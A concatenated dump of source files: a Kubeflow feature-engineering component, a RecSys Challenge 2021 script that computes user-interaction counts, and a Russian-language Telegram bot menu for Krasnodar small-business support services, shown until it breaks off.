blob.download_as_string()\ndf = pd.read_csv(io.BytesIO(data))\n\n# ===============================\n# Some feature engineering\n# 1. Mean fill + creating ratio\n# ===============================\n# Get mean value for the target column\nmean_target_col = df[\"TotalBsmtSF\"].mean()\n# Replace 0 value to mean\ndf[\"TotalBsmtSF_fillmean\"] = df[\"TotalBsmtSF\"].replace(0, mean_target_col)\n# Get mean value for the target column\nmean_target_col = df[\"BsmtUnfSF\"].mean()\n# Replace 0 value to mean\ndf[\"BsmtUnfSF_fillmean\"] = df[\"BsmtUnfSF\"].replace(0, mean_target_col)\ndf[\"BsmtUnfSF_TotalBsmtSF_ratio\"] = (\n df[\"BsmtUnfSF_fillmean\"] / df[\"TotalBsmtSF_fillmean\"]\n)\n\n# args.output_dataset has .path, .name, .metadata, and .uri\n# Save model and weights\nif not args.output_dataset.uri.startswith(\"gs://\"):\n save_full_path = args.output_dataset.name.replace(\"/gcs/\", \"gs://\")\nelse:\n save_full_path = args.output_dataset.uri\nprint(\"save_full_path\", save_full_path)\ndf.to_csv(save_full_path, index=False, header=True)\n\"\"\"","repo_name":"tkshnkmr/mlflow_demo","sub_path":"check_kfp/component2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13795759983","text":"import argparse\nimport os\nimport pickle\nimport yaml\nimport logging\nfrom collections import Counter\nfrom sipHash64 import sipHash64\nfrom read_dataset_utils import all_features_to_idx, labels_to_idx\nfrom utils import get_similar_interactions\n\n\nlog = logging.getLogger(__name__)\n\n\ndef get_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config-file\", type=str, default='config.yaml', help='Configuration file.')\n return parser\n\n\ndef process_example(features):\n engaged_with_user_id = features[all_features_to_idx['engaged_with_user_id']]\n enaging_user_id = features[all_features_to_idx['enaging_user_id']]\n\n # compute hash of `engaged_with_user_id` and `enaging_user_id` pairs\n key = sipHash64(f'{engaged_with_user_id}_{enaging_user_id}')\n\n hashtags = features[all_features_to_idx['hashtags']].split()\n # compute hash of hashtag and `enaging_user_id`\n key_hashtags = [sipHash64(f'{h}_{enaging_user_id}') for h in hashtags]\n\n language = features[all_features_to_idx['language']]\n # compute hash of language and `enaging_user_id`\n key_language = sipHash64(f'{language}_{enaging_user_id}')\n\n # compute hashes of users\n engaged_with_user_id = sipHash64(engaged_with_user_id)\n enaging_user_id = sipHash64(enaging_user_id)\n return engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language\n\n\ndef compute_interactions(config):\n def increase_reaction(relation, key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language):\n interaction_counter[relation][key] += 1\n num_enaged[relation][engaged_with_user_id] += 1\n num_enaging[relation][enaging_user_id] += 1\n\n interaction_counter_all[relation][key] += 1\n num_enaged_all[relation][engaged_with_user_id] += 1\n num_enaging_all[relation][enaging_user_id] += 1\n\n for key_hashtag_current in key_hashtags:\n user_hashtag_all[relation][key_hashtag_current] +=1\n user_hashtag[relation][key_hashtag_current] +=1\n\n\n interaction_counter_lang_all[relation][key_language] += 1\n interaction_counter_lang[relation][key_language] += 1\n\n # filenames with training data sepearated by day - calculated in `splt_by_date.py`\n filenames = [os.path.join(config['working_dir'], f) for f in 
os.listdir(config['working_dir']) if 'train_set' in f]\n\n # number of all enaged-enaging users interactions per each relation\n interaction_counter_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaged users per each relation\n num_enaged_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaging users per each relation\n num_enaging_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions with hashtags per each relation\n user_hashtag_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaging users with twitts from each language\n interaction_counter_lang_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n\n for filename in filenames:\n log.info(f\"Processing {filename}\")\n # interactions only for data from current day\n interaction_counter = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n num_enaged = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n num_enaging = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n user_hashtag = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n interaction_counter_lang = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # loading data from current day\n with open(filename, 'rb') as handle:\n train_day = pickle.load(handle)\n\n for example in train_day:\n line = example['line']\n features = line.split(\"\\x01\")\n engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language = process_example(features)\n\n if features[labels_to_idx[f'like_timestamp']] != '':\n increase_reaction('like', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n if features[labels_to_idx[f'reply_timestamp']] != '':\n increase_reaction('reply', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n\n if features[labels_to_idx[f'retweet_timestamp']] != '':\n increase_reaction('retweet', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n if features[labels_to_idx[f'retweet_with_comment_timestamp']] != '':\n increase_reaction('retweet_with_comment', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n\n file_suffix = filename.split('_')[-1]\n\n with open(f\"\"\"{config['working_dir']}/interaction_users_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaged_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(num_enaged, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaging_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(num_enaging, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/user_hashtag_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(user_hashtag, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang_day_{file_suffix}\"\"\", 'wb') as handle:\n 
pickle.dump(interaction_counter_lang, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n with open(f\"\"\"{config['working_dir']}/interaction_users\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaging\"\"\", 'wb') as handle:\n pickle.dump(num_enaging_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaged\"\"\", 'wb') as handle:\n pickle.dump(num_enaged_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/user_hashtag\"\"\", 'wb') as handle:\n pickle.dump(user_hashtag_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter_lang_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef save_interactions(config):\n log.info(\"Saving interactions\")\n with open(f\"\"\"{config['working_dir']}/author2similar_follow.pkl\"\"\", 'rb') as handle:\n auth2similar_followers = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/interaction_users\"\"\", 'rb') as handle:\n interaction_counter_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/num_enaging\"\"\", 'rb') as handle:\n num_enaging_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/num_enaged\"\"\", 'rb') as handle:\n num_enaged_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang\"\"\", 'rb') as handle:\n interaction_counter_lang_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/user_hashtag\"\"\", 'rb') as handle:\n user_hashtag_all = pickle.load(handle)\n\n filenames = [os.path.join(config['working_dir'], f) for f in os.listdir(config['working_dir']) if 'train_set_all' in f]\n for filename in filenames:\n log.info(f\"Processing {filename}\")\n\n # loading data from current day\n with open(filename, 'rb') as handle:\n train_day = pickle.load(handle)\n\n file_suffix = filename.split('_')[-1]\n\n with open(f\"\"\"{config['working_dir']}/interaction_users_day_{file_suffix}\"\"\", 'rb') as handle:\n interaction_counter = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/num_enaged_day_{file_suffix}\"\"\", 'rb') as handle:\n num_enaged = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/num_enaging_day_{file_suffix}\"\"\", 'rb') as handle:\n num_enaging = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/user_hashtag_day_{file_suffix}\"\"\", 'rb') as handle:\n user_hashtag = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang_day_{file_suffix}\"\"\", 'rb') as handle:\n interaction_counter_lang = pickle.load(handle)\n\n interactions_without_current_day = {\n 'like': interaction_counter_all['like'] - interaction_counter['like'],\n 'reply': interaction_counter_all['reply'] - interaction_counter['reply'],\n 'retweet': interaction_counter_all['retweet'] - interaction_counter['retweet'],\n 'retweet_with_comment': interaction_counter_all['retweet_with_comment'] - interaction_counter['retweet_with_comment']\n }\n\n for i, example in enumerate(train_day):\n line = example['line']\n features = line.split(\"\\x01\")\n\n engaged_with_user_id_orig = features[all_features_to_idx['engaged_with_user_id']]\n enaging_user_id_orig = features[all_features_to_idx['enaging_user_id']]\n\n engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language = 
process_example(features)\n\n num_enaged_like = num_enaged_all['like'][engaged_with_user_id] - num_enaged['like'][engaged_with_user_id]\n num_enaged_reply = num_enaged_all['reply'][engaged_with_user_id] - num_enaged['reply'][engaged_with_user_id]\n num_enaged_retweet = num_enaged_all['retweet'][engaged_with_user_id] - num_enaged['retweet'][engaged_with_user_id]\n num_enaged_retweet_with_comment = num_enaged_all['retweet_with_comment'][engaged_with_user_id] - num_enaged['retweet_with_comment'][engaged_with_user_id]\n\n num_enaging_like = num_enaging_all['like'][enaging_user_id] - num_enaging['like'][enaging_user_id]\n num_enaging_reply = num_enaging_all['reply'][enaging_user_id] - num_enaging['reply'][enaging_user_id]\n num_enaging_retweet = num_enaging_all['retweet'][enaging_user_id] - num_enaging['retweet'][enaging_user_id]\n num_enaging_retweet_with_comment = num_enaging_all['retweet_with_comment'][enaging_user_id] - num_enaging['retweet_with_comment'][enaging_user_id]\n\n interaction_users_like = interactions_without_current_day['like'][key]\n interaction_users_reply = interactions_without_current_day['reply'][key]\n interaction_users_retweet = interactions_without_current_day['retweet'][key]\n interaction_users_retweet_with_comment = interactions_without_current_day['retweet_with_comment'][key]\n\n similar_followers = get_similar_interactions(auth2similar_followers, engaged_with_user_id_orig, enaging_user_id_orig, interactions_without_current_day)\n\n interaction_counter_lang_like = interaction_counter_lang_all['like'][key_language] - interaction_counter_lang['like'][key_language]\n interaction_counter_lang_reply = interaction_counter_lang_all['reply'][key_language] - interaction_counter_lang['reply'][key_language]\n interaction_counter_lang_retweet = interaction_counter_lang_all['retweet'][key_language] - interaction_counter_lang['retweet'][key_language]\n interaction_counter_lang_retweet_with_comment = interaction_counter_lang_all['retweet_with_comment'][key_language] - interaction_counter_lang['retweet_with_comment'][key_language]\n user_hashtag_like = 0\n user_hashtag_reply = 0\n user_hashtag_retweet = 0\n user_hashtag_retweet_with_comment = 0\n\n for key_hashtag_current in key_hashtags:\n user_hashtag_like += (user_hashtag_all['like'][key_hashtag_current] - user_hashtag['like'][key_hashtag_current])\n user_hashtag_reply += (user_hashtag_all['reply'][key_hashtag_current] - user_hashtag['reply'][key_hashtag_current])\n user_hashtag_retweet += (user_hashtag_all['retweet'][key_hashtag_current] - user_hashtag['retweet'][key_hashtag_current])\n user_hashtag_retweet_with_comment += (user_hashtag_all['retweet_with_comment'][key_hashtag_current] - user_hashtag['retweet_with_comment'][key_hashtag_current])\n\n\n train_day[i]['interactions'] = [interaction_users_like, interaction_users_reply, interaction_users_retweet, interaction_users_retweet_with_comment,\n num_enaged_like, num_enaged_reply, num_enaged_retweet, num_enaged_retweet_with_comment,\n num_enaging_like, num_enaging_reply, num_enaging_retweet, num_enaging_retweet_with_comment,\n interaction_counter_lang_like, interaction_counter_lang_reply, interaction_counter_lang_retweet, interaction_counter_lang_retweet_with_comment,\n user_hashtag_like, user_hashtag_reply, user_hashtag_retweet, user_hashtag_retweet_with_comment\n ] + similar_followers\n\n with open(filename, 'wb') as handle:\n pickle.dump(train_day, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n parser = 
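The per-day and global Counter bookkeeping above is a leave-one-day-out scheme: subtracting a day's counts from the global totals gives every example of that day history features that exclude its own day. In miniature (a sketch; the key names are illustrative):

from collections import Counter

total = Counter({'pair_a': 5, 'pair_b': 2})  # counts over all training days
day = Counter({'pair_a': 2})                 # counts for the day being featurized
history = total - day                        # "all other days" counts
assert history['pair_a'] == 3 and history['pair_b'] == 2
# Counter subtraction keeps only positive entries, which is safe here
# because a single day's counts can never exceed the totals they feed into.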
get_parser()\n params = parser.parse_args()\n with open(params.config_file) as f:\n config = yaml.load(f)\n compute_interactions(config)\n save_interactions(config)\n","repo_name":"Synerise/recsys-challenge-2021","sub_path":"src/preprocessing/compute_interactions.py","file_name":"compute_interactions.py","file_ext":"py","file_size_in_byte":14033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"21135745092","text":"# -*- coding: utf-8 -*-\nimport telebot\nimport constants, os\nimport botan\nfrom telebot import types\n\nbot = telebot.TeleBot(constants.token)\n\nclass BotMenu:\n def main_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"📦Пакеты услуг\")\n user_markup.row(\"💳Финансы\", \"✴Услуги\")\n user_markup.row(\"🎓Обучение\", \"🏢Коворкинг\")\n user_markup.row(\"📅События\", \"☎Контакты\")\n bot.send_message(message.from_user.id, \"Выберите интересующий Вас пункт\", reply_markup=user_markup)\n\n def cont_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"🚀Центр поддержки предпринимательства\")\n user_markup.row(\"🚩Иные организации развития бизнеса\")\n user_markup.row(\"✒Жалобы и предложения\")\n bot.send_message(message.from_user.id, \"Полезные контакты\", reply_markup=user_markup)\n\n def finance_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Субсидии\")\n user_markup.row(\"Микрозаймы и кредитование\")\n user_markup.row(\"Поручительства\")\n bot.send_message(message.from_user.id, \"Финансовая поддержка бизнеса\", reply_markup=user_markup)\n\n def subsid_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в 💳Финансы\")\n user_markup.row(\"Промышленность\")\n user_markup.row(\"Сельское хозяйство\")\n user_markup.row(\"Инновации\")\n user_markup.row(\"Служба занятости\")\n bot.send_message(message.from_user.id, \"Субсидии для бизнеса\", reply_markup=user_markup)\n\n def mfo_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в 💳Финансы\")\n user_markup.row(\"Старт\", \"Фермер\")\n user_markup.row(\"Бизнес-оборот\", \"Ремесленник\")\n user_markup.row(\"Бизнес-инвест\", \"Новотех\")\n user_markup.row(\"Развитие и инновации\")\n bot.send_message(message.from_user.id, \"Пакеты микрозаймов и кредитования\", reply_markup=user_markup)\n\n def uslugi_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Разработка бизнес-планов\")\n user_markup.row(\"Разработка веб-сайтов\")\n user_markup.row(\"Создание фирменного стиля\")\n user_markup.row(\"Маркетинговые исследования\")\n user_markup.row(\"Консультации\")\n user_markup.row(\"Иные услуги\")\n bot.send_message(message.from_user.id, \"Бесплатные услуги и консультации центра поддержки предпринимательства\", reply_markup=user_markup)\n\n def grad_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Семинары центра поддержки\")\n user_markup.row(\"Школа молодого предпринимателя\")\n user_markup.row(\"«Бизнес класс»\")\n bot.send_message(message.from_user.id, \"Узнайте о действующих и предстоящих образовательных мероприятиях\",\n 
reply_markup=user_markup)\n\n def paketi_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"🚀Открывай\", \"📊Развивай\")\n user_markup.row(\"✅Производи\", \"🚚Экспортируй\")\n user_markup.row(\"📝Консультация On-Line\")\n bot.send_message(message.from_user.id, \"Выберите подходящий для Вас пакет услуг\",\n reply_markup=user_markup)\n\nbm = BotMenu()\n\n@bot.callback_query_handler(func=lambda c:True)\ndef inlin(c):\n if c.data == \"invest\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДепартамент инвестиций и развития малого и среднего предпринимательства Краснодарского края\\n\nАдрес: 350014, г, Краснодар, ул. Красная, 35\ninvestkuban@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612517310\")\n if c.data == \"micro\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nФонд микрофинансирования субъектов малого и среднего предпринимательства Краснодарского края\\n\nАдрес: г. Краснодар, ул. Трамвайная, 2/6\\n \nПредставительство: г. Армавир, ул. Ефремова, д. 270, 3 этаж, офис 5\ninfo@fmkk.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612980808\")\n if c.data == \"garant\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nГарантийный фонд Краснодарского края\\n\nАдрес: г. Краснодар, ул. Трамвайная, 2/6, 5 этаж, офис 505\ninfo@gfkuban.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78619920365\")\n if c.data == \"prom\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДепартамент промышленной политики Краснодарского края\\n\nАдрес: 350000, г. Краснодар, ул. Красная, д. 176\ndpp@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612517310\")\n if c.data == \"sh\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nМинистерство сельского хозяйства и перерабатывающей промышленности Краснодарского края\\n\nАдрес: г. Краснодар, ул. Рашпилевская, д. 365\nmsh@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612142556\")\n if c.data == \"trud\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСлужба труда и занятости населения министерства труда и социального развития Краснодарского края\\n\nАдрес: 350000, г. Краснодар, ул. Зиповская, д. 5\nkancel@dgsz.krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612571370\")\n if c.data == \"sobit5\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(\n text=\"19.05. В Москве пройдет Всемирный Саммит по Криптовалюте и Блокчейну\",\n callback_data=\"sob1\")\n but_2 = types.InlineKeyboardButton(\n text=\"06.06. «Неделя Российского Ритейла 2018» пройдет в Москве\",\n callback_data=\"sob2\")\n but_3 = types.InlineKeyboardButton(text=\"12.04. Конференция «Народные художественные промыслы России» пройдет в Москве\",\n callback_data=\"sob3\")\n but_4 = types.InlineKeyboardButton(\n text=\"18.04. В Москве состоится совещание по вопросам сохранения и развития ремесленной отрасли\",\n callback_data=\"sob4\")\n but_5 = types.InlineKeyboardButton(\n text=\"24.04. 
Краснодар включен в график проведения Open Innovations Startup Tour Фонда «Сколково»\",\n callback_data=\"sob5\")\n key.add(but_3, but_4, but_5, but_1, but_2)\n bot.send_message(c.message.chat.id, \"Ближайшие 5 событий в бизнесе Кубани\", reply_markup=key)\n if c.data == \"sob1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 19.05. В Москве пройдет Всемирный Саммит по Криптовалюте и Блокчейну\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 06.06. «Неделя Российского Ритейла 2018» пройдет в Москве\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 12.04. Конференция «Народные художественные промыслы России» пройдет в Москве\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 18.04. В Москве состоится совещание по вопросам сохранения и развития ремесленной отрасли\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 24.04. Краснодар включен в график проведения Open Innovations Startup Tour Фонда «Сколково»\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии субъектам деятельности в сфере промышленности при организации трудовой занятости осужденных\\n\nCумма субсидии - до 500 000 руб. Возмещается 60% от фактически произведенных затрат. Получатель – субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии субъектам деятельности в сфере промышленности на технологическое присоединение\\n\nСумма субсидии - до 1 800 000 руб. Возмещается 30% от затрат на технологическое присоединение. Получатель – субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на уплату % по кредитам полученным для пополнения оборотных\\n\nСумма субсидии - до 5 000 000 руб. Компенсируются проценты в размере не более 3/4 ключевой ставки Банка России, но не более 70 % от фактически уплаченных процентов. Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на уплату % по кредитам и на уплату дохода лизинговых компаний, полученных на создание новых производств, модернизацию и приобретение оборудования\\n\nСумма субсидии - до 10 000 000 руб. По кредитам компенсируются проценты в размере не более 3/4 ключевой ставки Банка России, но не более 70 % от фактически уплаченных процентов. По лизингу компенсируются часть дохода лизинговых компаний, являющихся частью лизинговых платежей, но не более 50% от фактически уплаченных платежей. Получатель-субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на возмещение затрат, связанных с осуществлением образовательной деятельности\\n\nСумма субсидии - до 1 000 000 руб. Возмещается 70 % от фактически произведенных и документально подтвержденных затрат. 
Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на возмещение части затрат на реализацию инвестиционных проектов\\n\nСумма субсидии - до 10 000 000 руб. Компенсируются 10 % от фактически произведенных и документально подтвержденных затрат. Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСельхозстрахование\\n\nВозмещается 50% от затрат.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nПриобретение элитных семян\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nПоддержка племенного крупного рогатого скота мясного направления\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на развитие садоводства и чаеводства\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДругие субсидии министерства сельского хозяйства и перерабатывающей промышленности Краснодарского края\\n\nОзнакомиться\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nВозмещение затрат на подготовку документов, представляемых при государственной регистрации\\n\nСумма по факту понесенных затрат, получатель – граждане, признанные в установленном порядке безработными и граждане, признанные в установленном порядке безработными и прошедшие профессиональное обучение или получившие дополнительное профессиональное образование по направлению органов службы занятости.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nВозмещение части затрат на дополнительное рабочее место для трудоустройства безработных граждан\\n\nСумма возмещения – 58 800 рублей, получатель – граждане, признанные в установленном порядке безработными и граждане.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nЕдиновременная финансовая помощь на открытие индивидуального предпринимателя или юридического лица\\n\nСумма возмещения – 117 600 рублей (зависит от максимального размера пособия по безработице, Постановление от 19.06.2012 года № 710), получатель – граждане, признанные в установленном порядке безработными и граждане, признанные в установленном порядке безработными и прошедшие профессиональное обучение или получившие дополнительное профессиональное образование по направлению органов службы занятости.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n\n\n@bot.message_handler(commands=[\"start\"])\ndef handle_start(message):\n bot.send_photo(message.from_user.id, photo=\"https://cdn1.savepice.ru/uploads/2018/3/22/2720d857ad2cb63b2995216c4573e92e-full.png\")\n bot.send_message(message.from_user.id, \"www.mbkuban.ru - официальный портал малого бизнеса Кубани\")\n bm.main_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"start\")\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef 
handle_start(message):\n if message.text == \"☎Контакты\":\n bm.cont_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Контакты\")\n if message.text == \"🚀Центр поддержки предпринимательства\":\n bot.send_message(message.from_user.id, \"\"\"\\r\nЦентр поддержки предпринимательства Краснодарского края\\n\nАдрес: 350911, г. Краснодар, ул. Трамвайная, 2/6, 1 этаж\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.from_user.id, \"+78007070711\")\n bot.send_message(message.chat.id, \"Для консультации on-line пишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"ЦПП_тел\")\n if message.text == \"🚩Иные организации развития бизнеса\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Департамент инвестиций и развития малого и среднего предпринимательства Краснодарского края\", callback_data=\"invest\")\n but_2 = types.InlineKeyboardButton(text=\"Фонд микрофинансирования Краснодарского края\", callback_data=\"micro\")\n but_3 = types.InlineKeyboardButton(text=\"Гарантийный фонд Краснодарского края\", callback_data=\"garant\")\n but_4 = types.InlineKeyboardButton(text=\"Департамент промышленной политики Краснодарского края\", callback_data=\"prom\")\n but_5 = types.InlineKeyboardButton(text=\"Министерство сельского хозяйства и перерабатывающей промышленности Краснодарского края\", callback_data=\"sh\")\n but_6 = types.InlineKeyboardButton(text=\"Служба труда и занятости населения министерства труда и социального развития Краснодарского края\", callback_data=\"trud\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6)\n bot.send_message(message.chat.id, \"Полезные контакты организаций и органов развития бизнеса\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Иныеорг_тел\")\n if message.text == \"🔙 Вернуться в Меню\":\n bm.main_menu(bot, message)\n if message.text == \"💳Финансы\":\n bm.finance_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Финансы\")\n if message.text == \"🔙 Вернуться в 💳Финансы\":\n bm.finance_menu(bot, message)\n if message.text == \"Субсидии\":\n bm.subsid_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Субсидии\")\n if message.text == \"Инновации\":\n bot.send_message(message.chat.id, \"\"\"\\r\nПредоставление субсидии в целях финансового обеспечения (возмещения) части затрат, связанных с созданием и (или) обеспечением деятельности центров молодежного инновационного творчества\\n\nСумма субсидии - до 3 600 000 руб.\nПолучатель – субъекты малого и среднего предпринимательства Краснодарского края\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78612517599\")\n botan.track(constants.botan_key, message.chat.id, message, \"Инновации\")\n if message.text == \"Микрозаймы и кредитование\":\n bm.mfo_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Микрозаймы и кредиты\")\n if message.text == \"Старт\":\n 